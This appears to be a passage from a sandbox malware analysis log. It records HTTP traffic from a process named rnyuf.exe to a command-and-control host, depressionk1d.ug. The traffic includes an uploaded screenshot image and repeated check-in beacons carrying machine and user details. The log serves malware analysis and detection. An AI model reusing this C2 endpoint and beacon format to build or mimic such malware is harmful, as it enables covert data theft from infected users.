                          Nov 12, 2021 22:24:04.249984980 CET10215OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:24:04.250269890 CET10225OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:24:04.250427008 CET10227OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:24:04.272608995 CET10232OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:04.272665977 CET10235OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:24:04.272696018 CET10237OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:04.272702932 CET10240OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:24:04.272710085 CET10243OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:04.272716045 CET10248OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:24:04.272723913 CET10251OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:04.343017101 CET10327INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:04 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          23192.168.2.449805178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:21.728152990 CET2873OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:21.728244066 CET2873OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:21.728414059 CET2883OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:21.728490114 CET2885OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:21.751025915 CET2891OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:21.751076937 CET2897OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:21.751107931 CET2908OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:21.751137972 CET2911OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:21.773627043 CET2914OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:21.773667097 CET2920OUTData Raw: 03 c5 28 3c d3 41 a5 26 98 ac 48 0d 3b 39 a8 f7 52 83 54 89 68 7e 69 41 a6 e6 8a a2 6c 48 0d 3b 35 18 a7 53 4c 96 87 e6 9d 9a 8f 34 a0 fb d5 5c 9b 12 03 4e 06 a2 06 9c 0d 32 5a 25 cd 00 d3 33 4a 1a 98 ac 49 9a 01 a6 73 4f 14 c9 b0 e1 52 2f 15 18
                          Data Ascii: (<A&H;9RTh~iAlH;5SL4\N2Z%3JIsOR/2.iY2,M54h<3<SsLICS3OwFX7TwR'}@;4L$*i<}89iAqBxZvO(n??3!T6PY?G:nf;r
                          Nov 12, 2021 22:23:21.773684978 CET2925OUTData Raw: 61 82 fe 55 f8 9d 67 c5 9b 54 b0 f8 61 15 9c 45 8c 70 4b 04 4a 58 f2 42 82 06 7d f8 af 9e ab bd f1 67 c5 1b ef 16 e8 6d a5 dc e9 d6 f0 21 91 64 0f 13 b6 41 1f 5f ad 70 55 78 78 4e 31 7c db dc 55 e5 19 49 72 ed 60 a5 a4 a2 b7 30 0a 29 45 06 80 0a
                          Data Ascii: aUgTaEpKJXB}gm!dA_pUxxN1|UIr`0)E(4;Pzm8P@:AKLBh0E%-Mj-Q@Rm(!L8UNDQL)TKN"GR3N+Si0m(H\QLC?0SZ%)hD@RFSMT'GjL
                          Nov 12, 2021 22:23:21.822199106 CET2982INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:21 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          230192.168.2.450036178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:04.262406111 CET10229OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:04.288937092 CET10255INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:04 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          231192.168.2.450038178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:04.418118000 CET10328OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:04.445785999 CET10328INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:04 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          232192.168.2.450039178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:04.573520899 CET10331OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:04.601016998 CET10331INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:04 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          233192.168.2.450041178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:04.754512072 CET10333OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:04.781559944 CET10334INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:04 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          234192.168.2.450043178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:04.992624044 CET10336OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:05.024060965 CET10336INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:05 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          235192.168.2.450044178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:05.313631058 CET10337OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:05.336143017 CET10338INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:05 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:05.336158037 CET10339INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          236192.168.2.450045178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:05.466169119 CET10340OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
